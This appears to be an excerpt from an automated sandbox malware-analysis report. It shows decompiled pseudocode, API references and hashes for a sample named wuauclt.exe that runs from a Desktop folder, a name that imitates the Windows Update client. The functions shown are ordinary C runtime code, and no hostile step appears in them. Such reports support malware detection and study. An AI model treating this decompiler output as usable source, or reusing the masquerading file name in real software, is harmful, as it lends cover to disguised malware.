						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E0025FB9A(_t49, 0, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0x273a7c = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0x273a80 = _t59;
									L16:
									E0025D2F4(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0x273a7c = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0x273a80 = _t43;
						goto L10;
					} else {
						_t44 = E0025D495();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E0025D2F4(_t64);
						return _t50;
					}
				} else {
					_t45 = E0025D495();
					_t65 = 0x16;
					 *_t45 = _t65;
					E0025BA52();
					return _t65;
				}
			}




















                                                0x0025c176
                                                0x0025c183
                                                0x0025c1a3
                                                0x0025c1b6
                                                0x0025c1bc
                                                0x0025c1c2
                                                0x0025c1ca
                                                0x0025c1d1
                                                0x0025c1d1
                                                0x0025c1d6
                                                0x0025c1dd
                                                0x0025c1e4
                                                0x0025c1f6
                                                0x0025c1fd
                                                0x0025c21c
                                                0x0025c228
                                                0x0025c243
                                                0x0025c246
                                                0x0025c24d
                                                0x0025c253
                                                0x0025c25a
                                                0x0025c25d
                                                0x0025c25f
                                                0x0025c263
                                                0x0025c26d
                                                0x0025c26d
                                                0x0025c26f
                                                0x0025c275
                                                0x0025c278
                                                0x0025c27a
                                                0x0025c280
                                                0x0025c281
                                                0x0025c287
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0025c265
                                                0x0025c265
                                                0x0025c265
                                                0x0025c268
                                                0x0025c269
                                                0x00000000
                                                0x0025c265
                                                0x0025c255
                                                0x00000000
                                                0x0025c255
                                                0x0025c22e
                                                0x0025c233
                                                0x0025c235
                                                0x0025c237
                                                0x00000000
                                                0x0025c1ff
                                                0x0025c1ff
                                                0x0025c204
                                                0x0025c206
                                                0x0025c207
                                                0x0025c23c
                                                0x0025c23c
                                                0x0025c28a
                                                0x0025c28b
                                                0x00000000
                                                0x0025c294
                                                0x0025c18b
                                                0x0025c18b
                                                0x0025c192
                                                0x0025c193
                                                0x0025c195
                                                0x00000000
                                                0x0025c19a

                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\wuauclt.exe,00000104), ref: 0025C1B6
                                                • _free.LIBCMT ref: 0025C281
                                                • _free.LIBCMT ref: 0025C28B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: _free$FileModuleName
                                                • String ID: C:\Users\user\Desktop\wuauclt.exe
                                                • API String ID: 2506810119-3040567212
                                                • Opcode ID: cbb507792e345d217f36dd02628cf4a09a639cdb526c80728badc3c0bda8fab7
                                                • Instruction ID: 4cdf98d1ecd14a38d88fa5bfaeaf76e36278aba2faa8bbe0f099e355013329be
                                                • Opcode Fuzzy Hash: cbb507792e345d217f36dd02628cf4a09a639cdb526c80728badc3c0bda8fab7
                                                • Instruction Fuzzy Hash: 82319271A14319EFDB21DF999C859AEBBACEB84311F204066EC08D7201E6B08E94DB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0025EB99 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 75%
                                                			E0025EB99(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E0025A9BC(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xffce8305
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E002676C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E002676C0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t116 = _t186 - 1;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E002596C0(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E002676C0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E002675E0();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E002675E0();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E002675E0();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E0025EE9C(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00267DA0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E0025D495();
					_t183 = 0x22;
					 *_t129 = _t183;
					E0025BA52();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                                                0x0025eb99
                                                0x0025eba4
                                                0x0025ebab
                                                0x0025ebad
                                                0x0025ebad
                                                0x0025ebaf
                                                0x0025ebb8
                                                0x0025ebba
                                                0x0025ebbf
                                                0x0025ebc5
                                                0x0025ebdb
                                                0x0025ebe0
                                                0x0025ebe3
                                                0x0025ebf0
                                                0x0025ebf5
                                                0x0025ec49
                                                0x0025ec51
                                                0x0025ec53
                                                0x0025ec55
                                                0x0025ec58
                                                0x0025ec58
                                                0x0025ec58
                                                0x0025ec5e
                                                0x0025ec66
                                                0x0025ec79
                                                0x0025ec7c
                                                0x0025ec7e
                                                0x0025ec81
                                                0x0025ec82
                                                0x0025eca3
                                                0x0025eca6
                                                0x0025eca6
                                                0x0025ec84
                                                0x0025ec84
                                                0x0025ec86
                                                0x0025ec91
                                                0x0025ec91
                                                0x0025ec93
                                                0x0025ec9a
                                                0x0025ec95
                                                0x0025ec95
                                                0x0025ec95
                                                0x0025ec93
                                                0x0025eca7
                                                0x0025eca9
                                                0x0025ecaa
                                                0x0025ecad
                                                0x0025ecaf
                                                0x0025ecb9
                                                0x0025ecc3
                                                0x0025ecb1
                                                0x0025ecb1
                                                0x0025ecb1
                                                0x0025ecc8
                                                0x0025ecc8
                                                0x0025eccd
                                                0x0025ecd0
                                                0x0025ecdb
                                                0x0025ecdb
                                                0x0025ecdb
                                                0x0025ecdb
                                                0x0025ecdf
                                                0x0025ece6
                                                0x0025ece7
                                                0x0025ecea
                                                0x0025eced
                                                0x0025eced
                                                0x0025ecef
                                                0x00000000
                                                0x00000000
                                                0x0025ed07
                                                0x0025ed0e
                                                0x0025ed12
                                                0x0025ed15
                                                0x0025ed18
                                                0x0025ed1a
                                                0x0025ed1a
                                                0x0025ed1a
                                                0x0025ed1c
                                                0x0025ed1f
                                                0x0025ed22
                                                0x0025ed24
                                                0x0025ed2c
                                                0x0025ed32
                                                0x0025ed35
                                                0x0025ed38
                                                0x0025ed39
                                                0x0025ed3c
                                                0x0025ed3f
                                                0x0025ed3f
                                                0x0025ed44
                                                0x0025ed47
                                                0x00000000
                                                0x00000000
                                                0x0025ed5f
                                                0x0025ed64
                                                0x0025ed68
                                                0x00000000
                                                0x00000000
                                                0x0025ed6c
                                                0x0025ed6f
                                                0x0025ed70
                                                0x0025ed70
                                                0x0025ed72
                                                0x0025ed75
                                                0x00000000
                                                0x00000000
                                                0x0025ed77
                                                0x0025ed7a
                                                0x0025ed81
                                                0x0025ed84
                                                0x0025ed87
                                                0x0025ed9d
                                                0x0025ed9d
                                                0x0025ed9d
                                                0x0025ed89
                                                0x0025ed89
                                                0x0025ed8b
                                                0x0025ed8e
                                                0x0025ed99
                                                0x0025ed90
                                                0x0025ed93
                                                0x0025ed93
                                                0x0025ed8e
                                                0x00000000
                                                0x0025ed87
                                                0x0025ed7c
                                                0x0025ed7c
                                                0x0025ed7e
                                                0x0025ed7e
                                                0x0025ecd2
                                                0x0025ecd2
                                                0x0025ecd5
                                                0x0025eda0
                                                0x0025eda0
                                                0x0025eda2
                                                0x0025eda4
                                                0x0025eda7
                                                0x0025eda8
                                                0x0025eda9
                                                0x0025edaa
                                                0x0025edb2
                                                0x0025edb2
                                                0x0025edb2
                                                0x0025edb4
                                                0x0025edb7
                                                0x0025edba
                                                0x0025edbc
                                                0x0025edbc
                                                0x0025edbe
                                                0x0025edd0
                                                0x0025edd4
                                                0x0025edd7
                                                0x0025edde
                                                0x0025ede6
                                                0x0025ede6
                                                0x0025ede9
                                                0x0025edeb
                                                0x0025edfc
                                                0x0025edfc
                                                0x0025ee00
                                                0x0025ee00
                                                0x0025ee03
                                                0x0025ee05
                                                0x0025ee08
                                                0x00000000
                                                0x0025eded
                                                0x0025eded
                                                0x0025edf3
                                                0x0025edf3
                                                0x0025edf7
                                                0x0025ee0a
                                                0x0025ee0a
                                                0x0025ee0e
                                                0x0025ee0f
                                                0x0025ee11
                                                0x0025ee13
                                                0x0025ee54
                                                0x0025ee54
                                                0x0025ee56
                                                0x0025ee63
                                                0x0025ee63
                                                0x0025ee65
                                                0x0025ee67
                                                0x0025ee68
                                                0x0025ee69
                                                0x0025ee70
                                                0x0025ee73
                                                0x0025ee75
                                                0x0025ee75
                                                0x0025ee76
                                                0x0025ee78
                                                0x0025ee7b
                                                0x0025ee7b
                                                0x0025ee7d
                                                0x0025ee7f
                                                0x00000000
                                                0x0025ee7f
                                                0x0025ee58
                                                0x0025ee5a
                                                0x00000000
                                                0x00000000
                                                0x0025ee5c
                                                0x00000000
                                                0x00000000
                                                0x0025ee5e
                                                0x0025ee61
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0025ee61
                                                0x0025ee1a
                                                0x0025ee20
                                                0x0025ee20
                                                0x0025ee22
                                                0x0025ee23
                                                0x0025ee24
                                                0x0025ee25
                                                0x0025ee2c
                                                0x0025ee2f
                                                0x0025ee31
                                                0x0025ee32
                                                0x0025ee34
                                                0x0025ee41
                                                0x0025ee41
                                                0x0025ee43
                                                0x0025ee45
                                                0x0025ee46
                                                0x0025ee47
                                                0x0025ee4e
                                                0x0025ee51
                                                0x0025ee53
                                                0x0025ee53
                                                0x00000000
                                                0x0025ee53
                                                0x0025ee36
                                                0x0025ee36
                                                0x0025ee38
                                                0x00000000
                                                0x00000000
                                                0x0025ee3a
                                                0x00000000
                                                0x00000000
                                                0x0025ee3c
                                                0x0025ee3f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0025ee3f
                                                0x0025ee1c
                                                0x0025ee1e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0025ee1e
                                                0x0025edef
                                                0x0025edf1
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0025edf1
                                                0x0025edeb
                                                0x00000000
                                                0x0025ecd5
                                                0x0025ecd0
                                                0x0025ebf7
                                                0x0025ebf9
                                                0x00000000
                                                0x0025ebfb
                                                0x0025ec11
                                                0x0025ec16
                                                0x0025ec18
                                                0x0025ec24
                                                0x0025ec2a
                                                0x0025ec2b
                                                0x0025ec2d
                                                0x0025ec2f
                                                0x0025ec3a
                                                0x0025ec3a
                                                0x0025ec3d
                                                0x0025ec3f
                                                0x0025ec3f
                                                0x0025ec42
                                                0x0025ec1a
                                                0x0025ec1a
                                                0x0025ec1a
                                                0x00000000
                                                0x0025ec18
                                                0x0025ebc7
                                                0x0025ebc7
                                                0x0025ebce
                                                0x0025ebcf
                                                0x0025ebd1
                                                0x0025ee83
                                                0x0025ee87
                                                0x0025ee8c
                                                0x0025ee8c
                                                0x0025ee9b
                                                0x0025ee9b

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: __alldvrm$_strrchr
                                                • String ID:
                                                • API String ID: 1036877536-0
                                                • Opcode ID: 18ea945ef78ebb0e7413536fd8ade7f809ff6629e6f6fd62cc1f4a2d91c88840
                                                • Instruction ID: 844c80359f8d7092e0ac5c4afaf5610febf55ee3e0aca73e89a0885f07a4029d
                                                • Opcode Fuzzy Hash: 18ea945ef78ebb0e7413536fd8ade7f809ff6629e6f6fd62cc1f4a2d91c88840
                                                • Instruction Fuzzy Hash: 24A189719343869FDF29CF18C8827AEBBE5EF15312F1A416EDC558B281C2348E59CB58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0025C5F7 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 82%
                                                			E0025C5F7(signed int __eax, void* __ecx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				short** _t16;
				char* _t19;
				void* _t20;

				_t13 = __ecx;
				_t16 =  *0x273a64; // 0x0
				if(_t16 != 0) {
					_t10 = 0;
					while( *_t16 != _t10) {
						_t2 = WideCharToMultiByte(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t19 = E0025D3BF(_t13, _t11, 1);
							_pop(_t13);
							if(_t19 == 0) {
								L10:
								_t2 = E0025D2F4(_t19);
								goto L11;
							} else {
								_t10 = 0;
								if(WideCharToMultiByte(0, 0,  *_t16, 0xffffffff, _t19, _t11, 0, 0) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t19);
									E0026081C();
									E0025D2F4(0);
									_t20 = _t20 + 0xc;
									_t16 =  &(_t16[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}











                                                0x0025c5f7
                                                0x0025c5fa
                                                0x0025c602
                                                0x0025c60b
                                                0x0025c660
                                                0x0025c619
                                                0x0025c61f
                                                0x0025c623
                                                0x0025c671
                                                0x0025c671
                                                0x0025c625
                                                0x0025c62d
                                                0x0025c630
                                                0x0025c633
                                                0x0025c66a
                                                0x0025c66b
                                                0x00000000
                                                0x0025c635
                                                0x0025c63f
                                                0x0025c64b
                                                0x00000000
                                                0x0025c64d
                                                0x0025c64d
                                                0x0025c64e
                                                0x0025c64f
                                                0x0025c655
                                                0x0025c65a
                                                0x0025c65d
                                                0x00000000
                                                0x0025c65d
                                                0x0025c64b
                                                0x0025c633
                                                0x0025c666
                                                0x0025c669
                                                0x00000000
                                                0x0025c669
                                                0x0025c664
                                                0x00000000
                                                0x0025c604
                                                0x0025c608
                                                0x0025c608
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f18a4853bd45119ccdbc98f69f0ba9050db7cec8d98d714276d083ca64dfb79
                                                • Instruction ID: 6a309bb0a68ffa9c9394ab834ff834a33a039fbdd319426fdbd4a12e0fd33968
                                                • Opcode Fuzzy Hash: 9f18a4853bd45119ccdbc98f69f0ba9050db7cec8d98d714276d083ca64dfb79
                                                • Instruction Fuzzy Hash: DC01D8B22293173EEA2029787CC5F27620DDB81776B301725B921611C1EBB08E64456C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0025D55E Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 95%
                                                			E0025D55E(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x273ab8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x26a1b8 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x80aab37d
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                                                0x0025d563
                                                0x0025d567
                                                0x0025d56e
                                                0x0025d572
                                                0x0025d580
                                                0x0025d596
                                                0x0025d59a
                                                0x0025d5c3
                                                0x0025d5c5
                                                0x0025d5c9
                                                0x0025d5cc
                                                0x0025d5cc
                                                0x0025d5d2
                                                0x0025d5d4
                                                0x00000000
                                                0x0025d5d5
                                                0x0025d59c
                                                0x0025d5a5
                                                0x0025d5b4
                                                0x0025d5a7
                                                0x0025d5aa
                                                0x0025d5b0
                                                0x0025d5b0
                                                0x0025d5b8
                                                0x00000000
                                                0x0025d5ba
                                                0x0025d5bd
                                                0x0025d5bf
                                                0x00000000
                                                0x0025d5bf
                                                0x0025d5b8
                                                0x0025d574
                                                0x0025d579
                                                0x00000000

                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0025A5BB,00000000,00000000,?,0025D505,0025A5BB,00000000,00000000,00000000,?,0025D776,00000006,FlsSetValue), ref: 0025D590
                                                • GetLastError.KERNEL32(?,0025D505,0025A5BB,00000000,00000000,00000000,?,0025D776,00000006,FlsSetValue,0026A688,0026A690,00000000,00000364,?,0025EA38), ref: 0025D59C
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0025D505,0025A5BB,00000000,00000000,00000000,?,0025D776,00000006,FlsSetValue,0026A688,0026A690,00000000), ref: 0025D5AA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                • Opcode ID: 0bd0a25f52821dfacca65d600968ed2f88a8672f1190642440403cefc0549fc8
                                                • Instruction ID: e36d692e79d3362f5307a3701513738e1ca1ab48a503b6d8f7c10a3e82b93fff
                                                • Opcode Fuzzy Hash: 0bd0a25f52821dfacca65d600968ed2f88a8672f1190642440403cefc0549fc8
                                                • Instruction Fuzzy Hash: F1014C726252275BC7319F68AC0CA56379CAF017A67610520FD0AD7280EB70C929C6E4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002550A0 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 74%
                                                			E002550A0(void* __ebx, void* __edx, void* __edi, signed int _a4) {
				signed int _v0;
				void* __esi;
				void* __ebp;
				signed int _t27;
				signed int _t33;
				signed int _t34;
				signed int _t41;
				signed int _t45;
				void* _t46;
				signed int _t47;
				signed int _t48;
				signed int _t52;
				signed int _t53;
				void* _t59;
				void* _t66;
				signed int _t67;
				signed int _t70;
				void* _t71;
				signed int _t72;
				void* _t76;

				_t66 = __edi;
				_t59 = __edx;
				_t46 = __ebx;
				_t27 = _a4;
				if(_t27 != 0) {
					__eflags = _t27 - 0xffffffff;
					if(__eflags > 0) {
						E00257EA5(__eflags);
						goto L10;
					} else {
						__eflags = _t27 - 0x1000;
						if(__eflags < 0) {
							_t27 = E002570A8(_t71, __eflags, _t27);
							_t76 = _t76 + 4;
							__eflags = _t27;
							if(__eflags != 0) {
								goto L1;
							} else {
								goto L12;
							}
						} else {
							_t2 = _t27 + 0x23; // 0x25501f
							_t52 = _t2;
							__eflags = _t52 - _t27;
							if(__eflags <= 0) {
								L10:
								E00257EA5(__eflags);
								goto L11;
							} else {
								_t52 = E002570A8(_t71, __eflags, _t52);
								_t76 = _t76 + 4;
								__eflags = _t52;
								if(__eflags == 0) {
									L11:
									E0025BA62(_t46, _t52, _t59, _t66, __eflags);
									L12:
									E0025BA62(_t46, _t52, _t59, _t66, __eflags);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t46);
									_push(_t71);
									_t72 = _t52;
									_t33 = _v0 - 1;
									__eflags = _t33;
									_t53 = _v0;
									_push(_t66);
									do {
